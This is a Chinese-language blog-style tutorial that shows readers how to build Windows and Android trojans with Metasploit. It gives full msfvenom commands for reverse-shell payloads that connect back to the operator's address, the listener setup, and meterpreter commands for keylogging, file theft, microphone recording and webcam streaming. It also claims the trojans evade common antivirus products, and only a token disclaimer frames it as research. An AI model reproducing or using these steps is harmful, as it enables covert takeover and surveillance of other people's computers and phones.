相信很多人都有這種感覺,覺得那些會做木馬病毒的人非常牛逼,當然會自己完全寫出來木馬病毒的肯定非常牛逼,但是實際上,大部分人都是在前人的基礎上修改,很多則是用工具生成,出于興趣,研究了一段時間"黑"科技,也實踐了一下!總結了幾點簡單的工具用法,如果你會用這些工具,你會發現也許一個木馬沒有你像現在那么難做出來!本文是本著研究的精神,所有攻擊行為都是測試,請勿用于非法用途!

測試環境:kali linux windows7 windows 10 Android等操作系統

主要工具:metasploit framework

關于所用工具,本文不做過多介紹,這里介紹的使用方法也是最基本最簡單的用法:

1.使用metasploit 工具生存一個木馬(windows版本) ,命令如下:

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.47 LPORT=8080 -f exe >demo.exe

LHOST=后面的ip地址是你自己的局域網ip,目前本人所有的攻擊測試僅在局域網試過,也就是內網,關于外網的使用暫時不太清楚如何進行!

demo.exe為生成的木馬文件,把木馬文件拷貝到對方電腦上,雙擊即可運行!據測試,該木馬可以過360安全衛士,電腦管家等常用殺毒軟件!這還是在沒有做任何加密\加殼的情況下.....不過在有些人的電腦上360可以殺出來!可能是版本不同

2.打開軟件,設置好監聽,命令依次如下:

use exploit/multi/handler
set payloads windows/meterpreter/reverse_tcp
set LHOST 192.168.1.47
set LPORT 8080
exploit

3.坐等上鉤

此時,只要對方電腦點擊運行demo.exe木馬文件,這邊監聽端口就可以收到信息,建立連接!然后可以執行一些入侵指令,對方現在電腦完全在你的掌控之下,常用命令如下:

sysinfo     //查看攻擊主機的系統信息
kill         //結束進程
ps          //查看進程
reboot      //重啟電腦
reg        //修改注冊表
shell        //獲取shell
shutdown    //關閉電腦
keyscan_start //開啟健盤記錄功能
keyscan_dump //查看健盤記錄信息
keyscan_stop //停止健盤記錄
download     //下載文件
upload        //上傳文件
uictl enable keyboard　　　//獲取鍵盤鼠標控制權
record_mic　　　　//音頻錄制
webcam_chat　　　//查看攝像頭接口
webcam_list　　　//查看攝像頭列表
webcam_stream　 //攝像頭視頻獲取
................

4.生成Android版本的木馬,其實步驟和上面差不多

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.47 LPORT=8080 -r >demo.apk

只要你下載安裝到你手機上,你手機基本上也是別人的了,獲取聯系人\通訊錄\定位打開攝像頭\照片.......而且經測試,小米手機自帶的安全中心對此木馬完全沒用!

不過,據我暫時了解的知識,距離一個完整的木馬還有點距離:

1.殺毒軟件.據我測試,騰訊的電腦管家就是垃圾,掃描不出來我生成的木馬,360基本上一掃就出來,經過簡單編碼加密后,360會提示風險程序,而系統自帶的windows defender更是一點點用都沒.不過要想真把木馬做成免殺還得花點功夫.......

2.木馬持續后門.所謂持續后門就是能讓木馬開機后自啟,經測試,msf自帶的2種方法無效.....暫時未找到可行性方法!

3.外網控制.這是一個大問題,比較難解決,現在的攻擊都是基于同一個局域網內!

4.權限問題.360是個麻煩事,在有些機子上進行操作,比如打開攝像頭,360會有提示.....而且木馬暫時還沒法子終結360的進程,所以蛋疼!

在日常生活中,專門去攻擊某些個人的情況很少,很多時候黑客都是采用自動化工具遍地撒網,利用一些公開的漏洞進行攻擊!普通人能做的只是讓自己別中這些自動化黑客工具的招就行了,如果某些個人或者組織想黑你,真的很簡單.............